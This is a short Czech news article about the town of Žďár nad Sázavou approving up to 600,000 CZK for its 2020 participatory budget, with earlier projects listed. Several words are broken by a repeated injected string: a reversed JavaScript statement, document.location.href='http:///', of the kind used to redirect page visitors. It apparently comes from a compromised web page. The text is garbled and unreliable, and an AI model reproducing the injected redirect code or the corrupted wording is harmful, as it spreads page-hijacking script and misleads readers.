Rainbow page separator

Participativní rozpočet plánují ve Žďáře i napřesrok

Neděle, 3. března 2019

Peníze, papírové bankovky

Žďár nad Sázavou / Finanční položku ve výši maximálně 600 tisíc korun jako příspěvek participativního rozpočtu na rok 2020 schválili žďárští radní a doporučili ji rovněž ke schválení tamním zastupitelům. Užší vedení města tak i nadále počítá s tím, že ve Žďáře na základě návrhů a následnému hlasování obyvatel bude docházet k různým drobnějším úpravám veřejného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru.
V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce budou v rámci participativního rozpočtu provedeny dvě akce, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úprava veřejného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru v ulici Bratří Čapků včetně herních prvků pro děti a rekonstrukce spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního hřiště v ulici Polní. Na oba projekty musí opět dohromady stačit 600 tisíc korun.
Před dvěma lety byl díky participativnímu rozpočtu upraven vstup do úvozu na Klafaru s připomínkou prvního osídlení Žďáru, terén v parku Farská humna a vodní pítko v atriu za obchodními domy na náměstí. Loni byl zrevitalizován vnitroblok v ulici Palachova a obnoveno dětské hřiště v ulici Dolní.